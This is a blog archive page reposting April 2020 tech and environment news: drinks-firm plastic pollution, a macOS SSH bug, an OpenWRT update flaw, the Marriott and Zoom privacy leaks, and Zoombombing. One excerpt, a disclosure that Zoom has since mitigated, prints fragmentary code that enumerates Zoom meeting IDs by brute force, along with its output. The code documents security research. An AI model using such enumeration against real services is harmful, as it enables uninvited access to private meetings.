The Linkielist

Linking ideas with the world

The Linkielist

Daily Archives: April 1, 2020

Report reveals ‘massive plastic pollution footprint’ of drinks firms

Posted on by

Four global drinks giants are responsible for more than half a million tonnes of plastic pollution in six developing countries each year, enough to cover 83 football pitches every day, according to a report.

The NGO Tearfund has calculated the greenhouse gas emissions from the open burning of plastic bottles, sachets and cartons produced by Coca-Cola, PepsiCo, Nestlé and Unilever in developing nations, where waste can be mismanaged because people do not have access to collections.

Taking a sample of six developing countries, reflecting a spread across the globe, the NGO estimated the burning of plastic packaging put on to the market by the companies creates 4.6m tonnes of carbon dioxide equivalent – equivalent to the emissions from 2m cars.

Tearfund analysed the plastic put on the market in China, India, the Philippines, Brazil, Mexico and Nigeria by the four companies to examine the impact of single use plastic in developing countries. The countries were chosen because they are large developing country markets, spread across three continents.

The sachets, bottles, and cartons sold in these countries often end up either being burned or dumped – creating a pollution problem equivalent to covering 83 football pitches with plastic to 10 centimetres deep each day.

The report says: “This massive plastic pollution footprint, while a crisis in and of itself, is also contributing to the climate crisis.”

It adds that the four companies make little or no mention of emissions from disposal of their products or packaging in their climate change commitments.

“These companies continue to sell billions of products in single-use bottles, sachets and packets in developing countries,” says the report.

“And they do this despite knowing that: waste isn’t properly managed in these contexts; their packaging therefore becomes pollution; and such pollution causes serious harm to the environment and people’s health. Such actions – with such knowledge – are morally indefensible.”

The charity is calling for the companies to urgently switch to refillable and reusable packaging instead of sachets and plastic bottles.

The NGO estimated how much of their plastic waste in each country is mismanaged, burned or dumped using World Bank data.

Source: Report reveals ‘massive plastic pollution footprint’ of drinks firms | Environment | The Guardian

Apple’s latest macOS Catalina update mysteriously borks SSH for some unlucky fans. What could be the cause?

Posted on by

Apple’s latest update to macOS Catalina appears to have broken SSH for some users.

Developer Tyler Hall published a blog post on Monday detailing the issue, but removed it after his writeup got noticed.

The issue is that under Apple’s macOS 10.15.4 update, released on March 24, trying to open a SSH connection to a port greater than 8192 using a server name, rather than an IP address, no longer works – for some users at least. SSH is a Swiss army knife that can be used to securely connect to remote machines to run commands, transfer files and other data, and so on.

The Register asked Hall to elaborate on his findings but he declined, citing the possibility that the problem might be particular to his set up rather than a bug in the software Apple shipped.

Hall demonstrated similar post-publication remorse this last October when he criticized the code quality of macOS Catalina, comparing it to Windows Vista. That sentiment is shared among many other macOS users (eg: “macOS 10.15 is chockablock with paper-cut bugs” – John Gruber). But the responses Hall received from friends within Apple led him to regret that post, too.

We asked Apple to comment but we’ve received no reply. Cupertino seldom addresses public criticism. Until June 2016, Apple even implied in its App Store Review Guidelines that it would look unfavorably on developers who complain publicly about rejected apps. Up to that point, its policy said, “If you run to the press and trash us, it never helps.”

The US government’s renewed antitrust scrutiny of companies like Amazon, Apple, Facebook, and Google in recent years has perhaps encouraged more caution in publicly declared tech platform policies.

The issue that Hall reported has been noted by others. A post two days ago on Apple’s discussion forum complains, “After that update I am no longer able to open a SSH connection to a port greater than 8192 using server name (instead of IP).” And three discussion participants claim they too have experienced the same issue.

One of these individuals, posting under the user name “webdeck,” filed a bug port in Open Radar, a public iOS and macOS bug reporting site created by developer Tim Burks because Apple hides its Radar bug reporting system from the public.

The bug report reads, “/usr/bin/ssh in macos 10.15.4 hangs if used with the -p flag to specify an alternate port and used with a hostname. This was not present in macOS 10.15.3.”

Source: Apple’s latest macOS Catalina update mysteriously borks SSH for some unlucky fans. What could be the cause? • The Register

OpenWRT code-execution bug found – update!

Posted on by

For almost three years, OpenWRT—the open source operating system that powers home routers and other types of embedded systems—has been vulnerable to remote code-execution attacks because updates were delivered over an unencrypted channel and digital signature verifications are easy to bypass, a researcher said.

OpenWRT has a loyal base of users who use the freely available package as an alternative to the firmware that comes installed on their devices. Besides routers, OpenWRT runs on smartphones, pocket computers and even laptops and desktop PCs. Users generally find OpenWRT to be a more secure choice because it offers advanced functions and its source code is easy to audit.

Security researcher Guido Vranken, however, recently found that updates and installation files were delivered over unencrypted HTTPs connections, which are open to attacks that allow adversaries to completely replace legitimate updates with malicious ones. The researcher also found that it was trivial for attackers with moderate experience to bypass digital-signature checks that verify a downloaded update as the legitimate one offered by OpenWTR maintainers. The combination of those two lapses makes it possible to send a malicious update that vulnerable devices will automatically install.

Exploits not for everyone

These code-execution exploits are limited in their scope because adversaries must either be in a position to conduct a man-in-the-middle attack or tamper with the DNS server that a device uses to find the update on the Internet. That means routers on a network that has no malicious users and using a legitimate DNS server are safe from attack. Vranken also speculates that packet spoofing or ARP cache poisoning may also make attacks possible, but he cautions that he didn’t test either method.

Source: OpenWRT code-execution bug puts millions of devices at risk | Ars Technica

Yes! Honda Follows Mazda By Ditching Some Touchscreen Controls For Not Being ‘Intuitive’

Posted on by

It seemed like a bit of a risk when Mazda decided to not offer a touchscreen in the new Mazda 3. But Mazda may have just been ahead of the trend, as Honda has also abandoned some reliance on the new Honda Jazz’s touch controls because they just aren’t “intuitive.”

Despite nearly a decade of dominating conversations about automotive design and not, for some reason, the risks of distracted driving, touchscreens are finally being seen for what they really are: annoying.

Honda’s decided the air conditioning controls on the new Honda Jazz, also known as the Honda Fit in the U.S. though we won’t get this new generation, are too good for a complicated, distracting touchscreen.

Here’s why, from Autocar:

Jazz project leader Takeki Tanaka explained: “The reason is quite simple – we wanted to minimise driver disruption for operation, in particular, for the heater and air conditioning.

“We changed it from touchscreen to dial operation, as we received customer feedback that it was difficult to operate intuitively. You had to look at the screen to change the heater seating, therefore, we changed it so one can operate it without looking, giving more confidence while driving.”

And here’s the part where anyone who has reviewed a car in the last decade goes and screams into their pillow with frustration, because that’s exactly the sort of feedback automakers have been getting from focus groups, customers and reviewers for about as long as these touchscreen systems have been in cars.

Touchscreens are worse than touch controls for one very obvious reason: A touchscreen requires two human senses—touch, obviously, and sight. But with enough experience, the genius of the human brain is capable of motor memory, so touch dials and buttons will eventually only require the memory of where it’s located and a finger to touch it. Eyes can stay on the road.

Honda did this earlier by bringing the volume knob back on the 2019 Civic.

The problem is people want cool technology in their cars. They want to feel like their hard-earned loan is going toward something nice and fancy and smarter than them. This is why some people like the Tesla tablet—they think its efficient to put literally thousands of functions all in one very distracting toy. That’s not very safe. It’s safer to put the toys away and just turn a knob to be more comfortable.

Simplicity is the greatest efficiency, and I’m pretty jazzed for a touchscreen-less future. It’s like music to my ears.

Source: Honda Follows Mazda By Ditching Some Touchscreen Controls For Not Being ‘Intuitive’

From 2019, after a deadly 2017 crash between a destroyer and an oil tanker: The US Navy will replace its touchscreen controls with mechanical ones on its destroyers

Ubisoft offers free games to encourage you to stay at home

Posted on by

Ubisoft thinks it has a simple way to encourage people to stay at home and wait out the COVID-19 pandemic: shower them with games. It’s running a month-long campaign that will give away free games, trials, discounts and other offers to give you something to do while you’re cooped up. It’s starting things off by offering the PC version of Rayman Legends for free on Uplay from now through April 3rd. It’s an old title, to be sure, but it might hit the spot if you’re looking for an upbeat game to remind you that things will get better.

Future offers will be available through Ubisoft’s Free Events site.

There’s no doubt that Ubi is using this partly as a promotional tool for its catalog. You might try a game you skipped the first time around, or might feel compelled to subscribe to Uplay+ to see more. At the same time, it might be particularly useful in some households. Not everyone has a backlog of games to burn through until lockdowns come to an end, let alone the money to buy more.

Source: Ubisoft offers free games to encourage you to stay at home | Engadget

Marriott Hotels hacked AGAIN: Two compromised employee logins abused to siphon off guests’ personal info

Posted on by

Marriott Hotels has suffered its second data spillage in as many years after an “unexpected amount” of guests’ data was accessed through two compromised employee logins, the under-fire chain has confirmed.

The size of the latest data exposure has not been disclosed, though Marriott admitted it seemed to have started in January 2020 and was detected “at the end of February.”

“We identified that an unexpected amount of guest information may have been accessed using the login credentials of two employees at a franchise property,” said Marriott, without identifying which of its 6,900 hotels worldwide was at the epicenter of the intrusion.

“Upon discovery, we confirmed that the login credentials were disabled, immediately began an investigation, implemented heightened monitoring, and arranged resources to inform and assist guests,” it continued.

Marriott did not explain why it took four weeks to begin alerting customers about the digital break-in.

Stolen data included name, postal and email addresses, phone numbers, Bonvoy loyalty card balance, gender, date of birth, linked loyalty scheme information from other companies and room/personal preferences.

The hotel chain asserted that credit card data, PINs, passport and driver’s licence information was not accessed by the hackers, whose identities are so far unknown.

Source: Marriott Hotels hacked AGAIN: Two compromised employee logins abused to siphon off guests’ personal info • The Register

Zoom is Leaking Peoples’ Email Addresses and Photos to Strangers

Posted on by

Popular video-conferencing Zoom is leaking personal information of at least thousands of users, including their email address and photo, and giving strangers the ability to attempt to start a video call with them through Zoom.

The issue lies in Zoom’s “Company Directory” setting, which automatically adds other people to a user’s lists of contacts if they signed up with an email address that shares the same domain. This can make it easier to find a specific colleague to call when the domain belongs to an individual company. But multiple Zoom users say they signed up with personal email addresses, and Zoom pooled them together with thousands of other people as if they all worked for the same company, exposing their personal information to one another.

“I was shocked by this! I subscribed (with an alias, fortunately) and I saw 995 people unknown to me with their names, images and mail addresses.” Barend Gehrels, a Zoom user impacted by the issue and who flagged it to Motherboard, wrote in an email.

Gehrels provided a redacted screenshot of him logged into Zoom with the nearly 1000 different accounts listed in the “Company Directory” section. He said these were “all people I don’t know of course.” He said his partner had the same issue with another email provider, and had over 300 people listed in her own contacts.

“If you subscribe to Zoom with a non-standard provider (I mean, not Gmail or Hotmail or Yahoo etc), then you get insight to ALL subscribed users of that provider: their full names, their mail addresses, their profile picture (if they have any) and their status. And you can video call them,” Gehrels said. A user still has to accept the call from the stranger for it to start, however.

1585667035243-zoom_blurred
A redacted screenshot of the Company Directory issue provided by Gehrels. Image: Motherboard

On its website, Zoom says, “By default, your Zoom contacts directory contains internal users in the same organization, who are either on the same account or who’s email address uses the same domain as yours (except for publicly used domains including gmail.com, yahoo.com, hotmail.com, etc) in the Company Directory section.”

Zoom’s system does not exempt all domains that are used for personal email, however. Gehrels said he encountered the issue with the domains xs4all.nl, dds.nl, and quicknet.nl. These are all Dutch internet service providers (ISPs) which offer email services.

On Twitter Motherboard found other instances of Dutch users reporting the same issue.

“I just had a look at the free for private use version of Zoom and registered with my private email. I now got 1000 names, email addresses and even pictures of people in the company Directory. Is this intentional?,” one user tweeted last week along with a screenshot.

Dutch ISP XS4ALL tweeted in response to a complaint on Sunday, “This is something we cannot disable. You could see if Zoom can help you with this.”

Do you know anything about data selling or trading? We’d love to hear from you. Using a non-work phone or computer, you can contact Joseph Cox securely on Signal on +44 20 8133 5190, Wickr on josephcox, OTR chat on jfcox@jabber.ccc.de, or email joseph.cox@vice.com.

Dutch ISP DDS told Motherboard in an email it was aware of the issue, but hadn’t heard directly from any of their own customers about it.

“Zoom maintains a blacklist of domains and regularly proactively identifies domains to be added,” a Zoom spokesperson told Motherboard. “With regards to the specific domains that you highlighted in your note, those are now blacklisted.” They also pointed to a section of the Zoom website where users can request other domains to be removed from the Company Directory feature.

Source: Zoom is Leaking Peoples’ Email Addresses and Photos to Strangers – VICE

Zoom: how you were able to join random meetings due to incredibly poor security design

Posted on by

In this publication we describe a technique which would have allowed a threat actor to potentially identify and join active meetings.

All the details discussed in this publication were responsibly disclosed to Zoom Video Communications, Inc. In response, Zoom introduced a number of mitigations, so this attack is no longer possible.

The Problem

If you use Zoom, you may already know that Zoom Meeting IDs are composed of 9, 10 or 11 digits. The problem was that if you hadn’t enabled the “Require meeting password” option or enabled Waiting Room, which allows manual participants admission, these 9-10-11 digits were the only thing that secured your meeting i.e. prevented an unauthorized person from connecting to it.


Let Me Guess…
The first thing we did was pre-generate the list of potentially valid Zoom Meeting IDs. We took 1000 “random” Meeting IDs and prepared the URL string for joining the meeting here as well:

urls = []
for _ in range(1000):
urls.append("https://zoom.us/j/{}".format(randint(100000000, 9999999999)))

But how could we determine if a Zoom Meeting ID represented a valid meeting or not? We discovered a fast and easy way to check this based on the following “div” element present in the HTML Body of the returned response, when accessing “Join Meeting” URL (https://zoom.us/j/{MEETING_ID})

<div id="join-errormsg" class="error"><i></i><span>Invalid meeting ID.</span></div&gt

I Found It!
We then tried to automate the described approach (just in case you don’t want to brute force all the Meeting IDs by hand):

for url in urls:
    yield MakeHTTPRequest(url=url, callback=parseResponse)

def MakeHTTPRequest(url, callback)
    

def parseResponse(response):
    if response.css('div#join-errormsg').get() is None:
        print('Valid Meeting ID found: {}'.format(response.url))
    else:
        print('Invalid Meeting ID')

…and look at the output:

Invalid Meeting ID
Invalid Meeting ID
Valid Meeting ID found: https://zoom.us/j/22XXX41X8
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Valid Meeting ID found: https://zoom.us/j/8XXX34XXX9
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Valid Meeting ID found: https://zoom.us/j/93XXX9XXX5
Invalid Meeting ID
Invalid Meeting ID

Bingo!

Results
We were able to predict ~4% of randomly generated Meeting IDs, which is a very high chance of success, comparing to the pure brute force.

Mitigation

We contacted Zoom on July 22, 2019 as part of a responsible disclosure process and proposed the following mitigations:
1. Re-implement the generation algorithm of Meeting IDs
2. Replace the randomization function with a cryptographically strong one.
3.Increase the number of digits\symbols in the Meeting IDs.
4.Force hosts to use passwords\PINs\SSO for authorization purposes.

Zoom representatives were very collaborative and responded quickly to our emails. Here is the list of changes that were introduced to the Zoom client\infrastructure following our disclosure:

  1. Passwords are added by default to all future scheduled meetings.
  2. Users can able to add a password to already-scheduled future meetings and received instructions by email on how to do so. See article for instructions: https://support.zoom.us/hc/en-us/articles/360033331271-Account-Setting-Update-Password-Default-for-Meeting-and-Webinar
  3. Password settings are enforceable at the account level and group level by the account admin.
  4. Zoom will no longer automatically indicate if a meeting ID is valid or invalid. For each attempt, the page will load and attempt to join the meeting. Thus, a bad actor will not be able to quickly narrow the pool of meetings to attempt to join.
  5. Repeated attempts to scan for meeting IDs will cause a device to be blocked for a period of time.

Source: Zoom-Zoom: We Are Watching You – Check Point Research

FBI Issues Warning, NY Attorney General Makes Inquiry After Wave of Zoom Hijackings

Posted on by

The FBI has issued a warning about video messaging service Zoom, and New York Attorney General’s office has made an inquiry into its cybersecurity practices, after a string of disturbing incidents involving takeovers of teleconferences.

Per Agence France-Presse, malicious individuals have been taking advantage of lax security and the surge in teleconferencing during the coronavirus pandemic to pull off a trick called “Zoombombing,” in which they can join any public meeting and use the app’s screen-sharing mode to broadcast whatever they want. All Zoom meetings are public by default, and as the Verge noted, the settings to restrict screen sharing to the host of a meeting (or turn it off after a meeting starts) are hidden under menus. This means that anyone who forgets to tweak these settings, which appears to be an awful lot of people, is vulnerable to Zoombombing.

Trolls have eagerly taken the opportunity to hijack Zoom meetings and broadcast pornography, slurs, and Nazi imagery to everything from religious institutions and corporate meetings to classrooms at schools. In one incident, someone took over a Chipotle meeting on Zoom featuring musician Lauv and promptly flooded it with hardcore porn. Zoom, which has experienced an explosion in downloads during the ongoing period of social distancing, has seemed caught off guard.

On Monday, the FBI’s Boston office issued a warning that it “has received multiple reports of conferences being disrupted by pornographic and/or hate images and threatening language. As individuals continue the transition to online lessons and meetings, the FBI recommends exercising due diligence and caution in your cybersecurity efforts.” In the warning, it noted one Massachusetts incident in which an individual joined an online high school classroom hosted on Zoom to yell profanities and reveal the teacher’s home address. Another school reported an incident to the FBI in which a man with “swastika tattoos” joined a meeting; the FBI told anyone who has had a Zoom call hijacked to contact its Internet Crime Complaint Center.

A spokesperson for the NY Attorney General’s office told AFP that they had sent a letter to Zoom “with a number of questions to ensure the company is taking appropriate steps to ensure users’ privacy and security.” The spokesperson added that they were “trying to work with the company” to prevent future incidents.

This isn’t the first time Zoom has come under scrutiny. On Tuesday, a report in the Intercept found that the service guarantees of end-to-end encryption for video meetings without a mobile device, but it actually uses transport encryption, allowing Zoom developers to access unencrypted audio and video content of meetings. (The Intercept noted that unlike Google, Facebook, and Microsoft, Zoom does not publish transparency reports on how many law enforcement requests for data it receives or how many it complies with.)

Zoom also recently pushed an update to nix code that sent analytics data to Facebook’s Graph API (even when Zoom users didn’t have an account on the social network) under a privacy policy that didn’t make the extent of the sharing clear. That is current the subject of a class action lawsuit, though whether or not the suit is viable is another question. Zoom also eventually caved last year and patched a “click-to-join” feature that installed insecure local web servers on Mac machines that weren’t deleted when the app was removed, allowing remote access to the webcams of any Mac that had current or previous installations of Zoom. The company had initially defended it as a convenience feature.

“We work 24 hours a day to ensure that hospitals, universities, schools and other companies can be connected and operational,” a Zoom spokesperson told AFP. “We appreciate the interest of the New York prosecutor in these matters and are happy to deliver the requested information.”

Source: FBI Issues Warning, NY Attorney General Makes Inquiry After Wave of Zoom Hijackings